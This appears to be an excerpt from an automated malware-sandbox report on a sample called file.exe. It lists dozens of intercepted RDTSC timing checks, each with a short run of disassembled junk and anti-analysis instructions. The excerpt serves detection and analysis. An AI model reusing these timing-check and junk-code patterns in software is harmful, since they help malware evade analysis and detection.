Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9ABD second address: BF9AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9AC1 second address: BF9B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F0F34BEC151h 0x0000000c jmp 00007F0F34BEC14Bh 0x00000011 popad 0x00000012 push eax 0x00000013 jp 00007F0F34BEC15Ah 0x00000019 jmp 00007F0F34BEC154h 0x0000001e xchg eax, esi 0x0000001f mov dword ptr [ebp+122D2C2Ch], edi 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jnl 00007F0F34BEC146h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9B06 second address: BF9B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9B0C second address: BF9B13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9BCC second address: BF9C1F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F345319E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F0F345319F4h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 jmp 00007F0F345319EEh 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F0F345319F4h 0x00000024 mov eax, dword ptr [eax] 0x00000026 push esi 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9C1F second address: BF9C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9E77 second address: BF9E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9E7B second address: BF9EB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F34BEC151h 0x0000000b popad 0x0000000c nop 0x0000000d sbb edx, 2DCDE361h 0x00000013 push 00000004h 0x00000015 adc edx, 54241085h 0x0000001b nop 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0F34BEC150h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9EB6 second address: BF9EE5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F0F345319E6h 0x0000000d jmp 00007F0F345319F9h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9EE5 second address: BF9EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA199 second address: BFA19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA19E second address: BFA200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC156h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movsx ecx, cx 0x0000000d push 0000001Eh 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F0F34BEC148h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push eax 0x0000002a mov edx, dword ptr [ebp+122D3EF0h] 0x00000030 pop edi 0x00000031 push eax 0x00000032 push ebx 0x00000033 pushad 0x00000034 jmp 00007F0F34BEC151h 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA39F second address: BFA3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA3A3 second address: BFA3A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA65F second address: BFA6F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0F345319EFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push edx 0x00000016 jo 00007F0F345319E6h 0x0000001c pop edx 0x0000001d popad 0x0000001e nop 0x0000001f mov edx, 15C23500h 0x00000024 lea eax, dword ptr [ebp+1247DFB2h] 0x0000002a push eax 0x0000002b jns 00007F0F345319FBh 0x00000031 mov dword ptr [esp], eax 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F0F345319E8h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e sub dl, FFFFFFFEh 0x00000051 lea eax, dword ptr [ebp+1247DF6Eh] 0x00000057 and ecx, dword ptr [ebp+122D3CD4h] 0x0000005d nop 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F0F345319F6h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA6F7 second address: BFA71E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F0F34BEC153h 0x00000012 jmp 00007F0F34BEC14Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA71E second address: BFA723 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33E0D second address: C33E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0F34BEC146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33E17 second address: C33E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F0F345319E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33E23 second address: C33E50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC156h 0x00000007 jng 00007F0F34BEC148h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jbe 00007F0F34BEC14Eh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C342E0 second address: C34301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F345319F0h 0x00000008 jbe 00007F0F345319E6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C34477 second address: C34488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC14Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C34488 second address: C3448C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C346F6 second address: C3470E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007F0F34BEC146h 0x0000000d ja 00007F0F34BEC146h 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3470E second address: C3472E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F0F345319E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3472E second address: C34738 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C34738 second address: C34756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319EEh 0x00000009 jmp 00007F0F345319ECh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C348CA second address: C348E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F0F34BEC15Ch 0x0000000c jmp 00007F0F34BEC150h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3651A second address: C3651F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3651F second address: C36542 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F34BEC156h 0x00000008 pushad 0x00000009 je 00007F0F34BEC146h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D11F second address: C3D125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3D125 second address: C3D129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C41830 second address: C41843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0F345319E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F0F345319E6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C41843 second address: C41849 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40F9C second address: C40FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40FA0 second address: C40FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40FA4 second address: C40FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40FB0 second address: C40FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC157h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40FCB second address: C40FCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4223E second address: C42249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C447C9 second address: C447E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F0F345319EDh 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C447E7 second address: C44803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC14Fh 0x00000009 popad 0x0000000a jo 00007F0F34BEC148h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4761A second address: C4763B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0F345319E6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F0F345319EDh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4763B second address: C47647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C47647 second address: C47654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F0F345319E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C471A3 second address: C471F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC146h 0x00000008 jmp 00007F0F34BEC14Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007F0F34BEC150h 0x00000015 pop ebx 0x00000016 jnc 00007F0F34BEC162h 0x0000001c jmp 00007F0F34BEC156h 0x00000021 jbe 00007F0F34BEC146h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C471F2 second address: C471F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4B1E9 second address: C4B20E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC152h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F0F34BEC14Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4E934 second address: C4E938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4E938 second address: C4E93E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4EAC2 second address: C4EAC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4EAC8 second address: C4EACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4EDC6 second address: C4EDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C546BD second address: C546C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C546C3 second address: C546D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F0F345319E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C546D2 second address: C546D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C546D8 second address: C546F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319F6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C546F2 second address: C546FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C549AB second address: C549B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C549B2 second address: C549C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC151h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55695 second address: C5569B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5569B second address: C556D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jp 00007F0F34BEC146h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F0F34BEC158h 0x00000015 pushad 0x00000016 popad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a push edx 0x0000001b push edi 0x0000001c pop edi 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C556D0 second address: C556D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5D7E3 second address: C5D7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B7D7 second address: C5B803 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F5h 0x00000007 push esi 0x00000008 jmp 00007F0F345319EBh 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B803 second address: C5B809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B809 second address: C5B835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0F345319EDh 0x0000000a pushad 0x0000000b jmp 00007F0F345319F7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B99C second address: C5B9B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0F34BEC153h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B9B5 second address: C5B9BF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F345319E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5B9BF second address: C5B9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5C0C3 second address: C5C0C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5C0C7 second address: C5C0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5C66C second address: C5C687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C612E7 second address: C612EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C612EC second address: C61310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F7h 0x00000009 pop edi 0x0000000a je 00007F0F345319ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C606DB second address: C606E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6084F second address: C60867 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C60D6D second address: C60D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C60D73 second address: C60D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C60D79 second address: C60D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6103A second address: C6103E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6103E second address: C61048 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C61048 second address: C6105D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319EFh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B19D second address: C6B1C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F0F34BEC15Eh 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B1C7 second address: C6B1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 ja 00007F0F345319E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B319 second address: C6B31D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B65D second address: C6B663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6B976 second address: C6B982 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F0F34BEC146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6BACC second address: C6BAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6BAD2 second address: C6BADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6BADF second address: C6BAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0F345319E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6BEFB second address: C6BEFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C755 second address: C6C75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C75B second address: C6C75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
